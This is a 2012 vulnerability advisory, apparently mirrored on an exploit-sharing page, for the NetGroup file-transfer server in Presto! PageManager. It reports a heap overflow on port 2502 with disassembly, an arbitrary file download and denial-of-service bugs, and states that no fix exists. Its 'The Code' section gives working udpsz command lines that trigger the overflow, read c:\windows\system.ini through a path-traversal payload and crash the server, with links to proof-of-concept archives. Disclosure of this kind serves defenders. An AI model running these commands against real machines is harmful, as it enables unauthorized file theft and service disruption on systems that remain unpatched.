扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
####################################################################### Luigi Auriemma Application:Presto! PageManager http://www.newsoftinc.com/products/product_page.php?P_Id=5 Versions: <= 9.01 Platforms:Windows, MacOSX Bugs: A] Heap-overflow B] Arbitray files downloading C] Denial of Service Exploitation: remote Date: 14 Mar 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web:aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Presto! PageManager is a management software for scanners and it's provided by default also by some hardware vendors (like Epson). It's bundled with a (manual) server program called NetGroup for remote files transfer: "The Network Group function helps you exchange files with your group members. Everyone in the working group should have Presto! PageManager running." ####################################################################### ======= 2) Bugs ======= ---------------- A] Heap-overflow ---------------- Buffer overflow on port 2502 while copying of the message string into a small heap buffer: 004151BE|. 33C0 XOR EAX,EAX 004151C0|. F2:AEREPNE SCAS BYTE PTR ES:[EDI]; strlen 004151C2|. F7D1 NOT ECX 004151C4|. 2BF9 SUB EDI,ECX 004151C6|. 6A FFPUSH -1 004151C8|. 8BC1 MOV EAX,ECX 004151CA|. 8BF7 MOV ESI,EDI 004151CC|. 8BFA MOV EDI,EDX 004151CE|. C1E9 02SHR ECX,2 ; heap overflow 004151D1|. F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 004151D3|. 8BC8 MOV ECX,EAX 004151D5|. 83E1 03AND ECX,3 004151D8|. F3:A4REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 004151DA|. 8D4C24 14LEA ECX,DWORD PTR SS:[ESP+14] 004151DE|. E8 1B370000CALL <JMP.&MFC42.#5572> 004151E3|. 8B5424 10MOV EDX,DWORD PTR SS:[ESP+10] 004151E7|. 8D4C24 2CLEA ECX,DWORD PTR SS:[ESP+2C] 004151EB|. 51 PUSH ECX 004151EC|. 52 PUSH EDX 004151ED|. E8 56350000CALL <JMP.&PMCommon._GetFileExtName> 004151F2|. BE 94014200MOV ESI,NetGroup.00420194 ;ASCII ".NSOFT" ----------------------------- B] Arbitray files downloading ----------------------------- The software allows downloading any file. -------------------- C] Denial of Service -------------------- Just a simple (auto)termination caused by the impossibility of allocating the amount of memory specified by the client. There is also a "division by zero" when specifying a file size of 0 bytes. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip A] udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff just a quick test, exist better ways that show code execution B] udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8 or udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8 C] udpsz -T -C "00010000 ffffffff" SERVER 2501 -1 or udpsz -T -C "00000100 ffffffff" SERVER 2502 -1 ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### |
体验盒子
